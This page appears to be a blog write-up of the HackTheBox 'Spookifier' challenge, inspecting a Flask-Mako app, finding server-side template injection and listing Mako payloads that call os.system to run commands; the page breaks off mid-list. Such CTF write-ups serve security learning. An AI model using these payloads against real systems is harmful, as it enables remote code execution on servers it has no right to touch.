<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="D K V V Varma">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2024/09/29/spookifier/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="Hello There! For today’s adventure we will be solving Spookifier from HackTheBox Introduction: SPOOKIFIER is an innovative tool that brings a touch of fright and fun to your digital content. It’s perf">
<meta property="og:type" content="article">
<meta property="og:title" content="Spookifier">
<meta property="og:url" content="http://example.com/2024/09/29/spookifier/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Hello There! For today’s adventure we will be solving Spookifier from HackTheBox Introduction: SPOOKIFIER is an innovative tool that brings a touch of fright and fun to your digital content. It’s perf">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/112m5rfqraqrhd14pmobp/1.png?rlkey=zg9qkz8eyytfzewvbzp3jdstf&st=ag86wfde&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/3c39br4bf8ezd77oe5flw/2.png?rlkey=8cclyosird4egk300rwgk4mfm&st=ahie949r&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/lircd8an6q5nm1bkz6mtq/3.png?rlkey=8jq7j34xq8n3of2r79ukb8lo0&st=v64h66oi&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/29igy6a3bcndk6bw9xz8l/4.png?rlkey=94phqs15ysjw8yd5rqiogucms&st=2qxtfr6r&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/2giuu4fk6b1fl436hn5sy/5.png?rlkey=zvr44ytapj2bfjculwjiwjdoa&st=47vtv7ps&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/zvpzr255umzrpteo18thr/6.png?rlkey=y4zq7wzz3viocgpymeuivo3c8&st=fgsj23o2&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/y0wt7ql1g7t27kxe9ubkd/7.png?rlkey=mctekmiekrp59dtoz99am45v6&st=sy6idpbd&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/r1aysqahgtwzmth1gd7q5/8.png?rlkey=ymhydg2tjabyguztm7qjx6p06&st=nhqhy0jy&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/qsqo8a39cvq1vo1z2o8d0/9.png?rlkey=1kpjav4jradepkq5dbr2z67hd&st=29r6yedx&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/0s8k78s1ig0rsh7w2do6l/10.png?rlkey=4cwmlsanc3ohe5yj4r1u3fre2&st=xme6c9c8&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/mcyz6ugldq2m7hbk8zhea/11.png?rlkey=905oorsz81xf2dywghtctez7g&st=a9k7wfkr&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/ev5g8utey32ecklr5y2rt/12.png?rlkey=cywt80cxbnoy3qsyav1qhkgtr&st=ah9sp3hf&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/ev5g8utey32ecklr5y2rt/12.png?rlkey=cywt80cxbnoy3qsyav1qhkgtr&st=ah9sp3hf&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/awh8x685bx7st9efbq6nd/14-1.png?rlkey=cznnn50lugr8873c8p66u1bz2&st=l7v6ceh1&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/qd3ihg9swspeg4w4rrge6/15-1.png?rlkey=0e9ew3wzggvwt507k05gvnf31&st=ozn0rw17&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/k2277xnd7isp6rvyia0ed/17.png?rlkey=2bzcfkhuazpo08d8yi3tmbu2r&st=ndb54uxz&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/e7wwb7s6c7wfy63odnac7/18.png?rlkey=79gmhb9r8laogk4sldqrqh2qw&st=daj21qy0&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/e7wwb7s6c7wfy63odnac7/18.png?rlkey=79gmhb9r8laogk4sldqrqh2qw&st=daj21qy0&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/uwtmwkh48hy8b15ievfjf/19.png?rlkey=mxc9y9idxxp29fjicp1cu4bke&st=ed3avlvu&dl=0">
<meta property="article:published_time" content="2024-09-29T15:44:29.000Z">
<meta property="article:modified_time" content="2024-09-29T16:33:11.122Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="HackTheBox">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://dl.dropbox.com/scl/fi/112m5rfqraqrhd14pmobp/1.png?rlkey=zg9qkz8eyytfzewvbzp3jdstf&st=ag86wfde&dl=0">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&amp;st=hn686juk&amp;dl=0" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&amp;st=hn686juk&amp;dl=0">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&st=hn686juk&dl=0">
    <!--- Page Info-->
    
    <title>
        
            Spookifier -
        
        DKVV&#39;s blog
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
        <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    
<script src="/js/libs/anime.min.js"></script>

    <h1 class="ml13">
        DKVV&#39;s blog
    </h1>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });


        anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [100,0],
                translateZ: 0,
                opacity: [0,1],
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i
            }).add({
            targets: '.ml13 .letter',
            translateY: [0,-100],
            opacity: [1,0],
            easing: "easeInExpo",
            duration: 1200,
            delay: (el, i) => 100 + 30 * i
        });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            hidePreloaderAfterTimeout(1000); // Hide after 1000 milliseconds once the window has loaded
        });

        // Backup failsafe: Hide preloader after a maximum of 5000 milliseconds, regardless of the window load event
        hidePreloaderAfterTimeout(5000);

        function hidePreloaderAfterTimeout(delay) {
            setTimeout(function () {
                var preloader = document.querySelector('.preloader');
                preloader.style.opacity = '0';
                setTimeout(function () {
                    preloader.style.display = 'none';
                }, 200);
            }, delay);
        }
    </script>
</div>
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    <!--- Font Part-->
    
    
    
    


    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"5rem","h2":"4rem","h3":"2.8rem","h4":"2.5rem","h5":"2.2rem","h6":"2rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":["Aspire Conquer Inspire"]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":false,"default":null},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"dark"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":null,"enable":false,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"https://dl.dropbox.com/scl/fi/2kvpgh0u6as51zby0m1k3/Tron-wallpaper.png?rlkey=a4i210lfhgpma6mx35im5zhem&st=1ezkpxnx&dl=0","dark":"https://dl.dropbox.com/scl/fi/b4ibcd491p94r5i3o3nxo/tronbg.jpg?rlkey=uvm6n8l87w2ms3trt383o6k7y&st=jxf40cnb&dl=0"},"title":"Hello There!","subtitle":{"text":["In a digital world","skepticism is your armor"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":{"icon":"fab fa-github","link":"https://github.com/dkvvvarma"},"instagram":null,"zhihu":null,"twitter":"https://x.com/dkvvvarma","email":null,"linkedin":"nhttps://www.linkedin.com/in/dkvvvarma/"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://dl.dropbox.com/scl/fi/tfaps363m8w4oop0dr0sp/logo_tron.png?rlkey=4v0s2on6alnap1ynnhvt5e8a9&st=dcg7xklo&dl=0">
                </a>
            
            <a class="logo-title" href="/">
                
                DKVV&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">2</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color text-4xl md:text-6xl font-bold px-2 sm:px-6 md:px-8 py-3">Spookifier</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&st=hn686juk&dl=0">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">D K V V Varma</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Aspire Conquer Inspire</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-09-29 21:14:29</span>
        <span class="mobile">2024-09-29 21:14:29</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-09-29 22:03:11</span>
            <span class="mobile">2024-09-29 22:03:11</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/HackTheBox/">HackTheBox</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <p>Hello There! For today’s adventure we will be solving <code>Spookifier</code> from HackTheBox</p>
<p><strong>Introduction:</strong></p>
<p>SPOOKIFIER is an innovative tool that brings a touch of fright and fun to your digital content. It’s perfect for creating themed content, particularly around occasions like Halloween. With SPOOKIFIER, you can effortlessly transform your ordinary texts and graphics into spooky versions filled with ghostly charm. Get ready to spook your audience and bring a unique, eerie vibe to your digital creations.</p>
<p><strong>Room Description:</strong> There’s a new trend of an application that generates a spooky name for you. Users of that application later discovered that their real names were also magically changed, causing havoc in their life. Could you help bring down this application?</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/112m5rfqraqrhd14pmobp/1.png?rlkey=zg9qkz8eyytfzewvbzp3jdstf&st=ag86wfde&dl=0"
                      alt="1.png"
                ></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://prod-files-secure.s3.us-west-2.amazonaws.com/d31c7c8c-5aa6-4285-9c64-ce0800706c95/9b7049c5-512e-4bf3-a3f2-a541429e1e2b/spookifier.zip" >spookifier.zip <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>Downloading the zip file, It has the following contents</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/3c39br4bf8ezd77oe5flw/2.png?rlkey=8cclyosird4egk300rwgk4mfm&st=ahie949r&dl=0"
                      alt="2.png"
                ></p>
<p>By going through the docker file , we can understand that we are installing flask_mako</p>
<blockquote>
<p><strong>Flask-Mako</strong> is a powerful tool for web developers working with Flask, a popular web framework in Python. As an extension, Flask-Mako serves as a bridge between Flask and the Mako templating engine. The Mako templating engine is designed to be fast and highly flexible, which makes it an excellent choice for generating dynamic HTML content. It offers the advantage of cleaner syntax compared to other templates and allows for complex templating scenarios. By using Flask-Mako, developers can use Mako’s syntax and functionality within their Flask applications. This includes features like template inheritance, filters, and the ability to embed raw Python code within templates. Moreover, Flask-Mako also facilitates easy management of static files such as CSS and JavaScript, which are crucial elements of any modern web application. In a nutshell, Flask-Mako brings the power and flexibility of Mako to Flask, making it simpler for developers to create dynamic, feature-rich web applications</p>
</blockquote>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/lircd8an6q5nm1bkz6mtq/3.png?rlkey=8jq7j34xq8n3of2r79ukb8lo0&st=v64h66oi&dl=0"
                      alt="3.png"
                ></p>
<p>Going through other files</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/29igy6a3bcndk6bw9xz8l/4.png?rlkey=94phqs15ysjw8yd5rqiogucms&st=2qxtfr6r&dl=0"
                      alt="4.png"
                ></p>
<p>Config:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/2giuu4fk6b1fl436hn5sy/5.png?rlkey=zvr44ytapj2bfjculwjiwjdoa&st=47vtv7ps&dl=0"
                      alt="5.png"
                ></p>
<p>Challenges application&#x2F;blueprints&#x2F;routes.py</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/zvpzr255umzrpteo18thr/6.png?rlkey=y4zq7wzz3viocgpymeuivo3c8&st=fgsj23o2&dl=0"
                      alt="6.png"
                ></p>
<p>The static directory consisted of web template and all</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/y0wt7ql1g7t27kxe9ubkd/7.png?rlkey=mctekmiekrp59dtoz99am45v6&st=sy6idpbd&dl=0"
                      alt="7.png"
                ></p>
<p>There is a main code in apllication</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, jsonify</span><br><span class="line"><span class="keyword">from</span> application.blueprints.routes <span class="keyword">import</span> web</span><br><span class="line"><span class="keyword">from</span> flask_mako <span class="keyword">import</span> MakoTemplates</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">MakoTemplates(app)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">response</span>(<span class="params">message</span>):</span><br><span class="line">    <span class="keyword">return</span> jsonify(&#123;<span class="string">&#x27;message&#x27;</span>: message&#125;)</span><br><span class="line"></span><br><span class="line">app.register_blueprint(web, url_prefix=<span class="string">&#x27;/&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.errorhandler(<span class="params"><span class="number">404</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">not_found</span>(<span class="params">error</span>):</span><br><span class="line">    <span class="keyword">return</span> response(<span class="string">&#x27;404 Not Found&#x27;</span>), <span class="number">404</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.errorhandler(<span class="params"><span class="number">403</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">forbidden</span>(<span class="params">error</span>):</span><br><span class="line">    <span class="keyword">return</span> response(<span class="string">&#x27;403 Forbidden&#x27;</span>), <span class="number">403</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.errorhandler(<span class="params"><span class="number">400</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bad_request</span>(<span class="params">error</span>):</span><br><span class="line">    <span class="keyword">return</span> response(<span class="string">&#x27;400 Bad Request&#x27;</span>), <span class="number">400</span></span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>After going through lines of code , we can see tha6t everything goes through blueprint</p>
<p>Now lets pay the site a little visit.</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/r1aysqahgtwzmth1gd7q5/8.png?rlkey=ymhydg2tjabyguztm7qjx6p06&st=nhqhy0jy&dl=0"
                      alt="8.png"
                ></p>
<p>Just for fun i entered name : wayne and here is the output I got</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/qsqo8a39cvq1vo1z2o8d0/9.png?rlkey=1kpjav4jradepkq5dbr2z67hd&st=29r6yedx&dl=0"
                      alt="9.png"
                ></p>
<p>performing little recon on mako it shows that its vulnerable to serverside template injection</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/0s8k78s1ig0rsh7w2do6l/10.png?rlkey=4cwmlsanc3ohe5yj4r1u3fre2&st=xme6c9c8&dl=0"
                      alt="10.png"
                ></p>
<p>So trying a sstl payload to check</p>
<p>”36”</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/mcyz6ugldq2m7hbk8zhea/11.png?rlkey=905oorsz81xf2dywghtctez7g&st=a9k7wfkr&dl=0"
                      alt="11.png"
                ></p>
<p>let’s try some available sstl payloads</p>
<p>Before executing the payload , I tried retrieving the self object</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/ev5g8utey32ecklr5y2rt/12.png?rlkey=cywt80cxbnoy3qsyav1qhkgtr&st=ah9sp3hf&dl=0"
                      alt="12.png"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/ev5g8utey32ecklr5y2rt/12.png?rlkey=cywt80cxbnoy3qsyav1qhkgtr&st=ah9sp3hf&dl=0"
                      alt="13.png"
                ></p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$&#123;self.module.cache.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.cache.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.cache.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.**init**.**globals**[&#x27;util&#x27;].os.system(&#x27;id&#x27;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.runtime.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.filters.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.exceptions.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.**init**.**globals**[&#x27;os&#x27;].system(&#x27;id&#x27;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.cache.util.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.util.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template._mmarker.module.cache.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.cache.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span 